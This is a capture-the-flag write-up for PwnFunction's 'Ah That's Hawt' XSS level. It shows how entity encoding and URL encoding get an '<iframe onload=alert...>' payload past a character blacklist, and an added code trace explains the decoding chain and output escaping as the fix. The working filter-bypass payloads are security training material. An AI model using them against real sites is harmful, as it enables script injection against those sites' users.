Ah That’s Hawt PwnFunction XSS Solution

Ah That’s Hawt is an easy level too, but it will teach you about encoding and how to pass data in a different form than we’re used to, so let’s start.

First, we need to analyze the code.

Ah That’s Hawt PwnFunction Code

Just like the previous levels, we have a value that is passed in a GET parameter called “markassbrownlee”.

Then these characters are removed from the value: “[(`)\]”. So we can’t use ‘alert(1)’ in that form, nor can we close our JavaScript tag with </script>.

So what can we do? There’s something called HTML encoding (HTML entity encoding, not URL encoding) that the code does not filter, so we will use that technique.

You can use the following site for easier encoding rather than doing each character alone.

Now we can write what we want. We can use the <iframe> tag since it’s allowed inside an h2 tag, so let’s enter the following into the encoding site:

<iframe onload=alert(1337)>

Please note that we will only encode the left and right parentheses, since they’re the ones filtered:

<iframe onload=alert&#40;1337&#41;>

Now if you try it, you will see that it doesn’t work and not everything is passed, because # and & are special characters in a URL: # means an id in the HTML document (the fragment) and & introduces another parameter. So let’s encode the parameter with URL encoding (you can do it from the previous site by using a chain option).

You should get the following:

<iframe onload=alert%26%2340%3b1337%26%2341%3b>
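
The decoding chain described above, traced in Node.js as an added example (not code from the challenge or from this post): URL parsing, the blacklist, then the HTML parser's entity decoding, with output encoding shown as the fix. The filter regex is reconstructed from the characters the post lists, `challenge.example` is a placeholder origin, and `decodeEntities` is a simplified stand-in for the browser's parser.

```javascript
// Added example. Assumptions: FILTER is reconstructed from the characters
// the post lists; the origin below is a placeholder, not the real site.
const FILTER = /[(`)\\]/g;

// Step 1: the value the page code receives after URL parsing.
function receivedValue(url) {
  return new URL(url).searchParams.get("markassbrownlee");
}

// Step 2: the blacklist, which strips ( ` ) and \ from the value.
function blacklist(value) {
  return value.replace(FILTER, "");
}

// Step 3: simplified model of the HTML parser decoding decimal character
// references (a real parser also handles hex and named references).
function decodeEntities(html) {
  return html.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));
}

// Fix: encode on output so the value can only ever be rendered as text.
// In the DOM, assigning to textContent instead of innerHTML does the same.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

const base = "https://challenge.example/?markassbrownlee=";
const raw = base + "<iframe onload=alert&#40;1337&#41;>";             // entities only
const encoded = base + "<iframe onload=alert%26%2340%3b1337%26%2341%3b>"; // entities + URL encoding

function trace(url) {
  const received = receivedValue(url);
  const filtered = blacklist(received);
  return {
    received,                              // after URL decoding
    filterChangedIt: filtered !== received, // did the blacklist see anything?
    parserSees: decodeEntities(filtered),   // after HTML entity decoding
    escaped: escapeHtml(received),          // what a safe sink would emit
  };
}

console.log(trace(raw));     // value is cut at "&" and "#"
console.log(trace(encoded)); // filter sees no parentheses; the parser restores them
```

The blacklist runs between two decoding steps and inspects neither the final form nor the context, which is why escaping at the output sink is the reliable control.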

And that would be it for the Ah That’s Hawt PwnFunction level. Hope you got something new out of this post.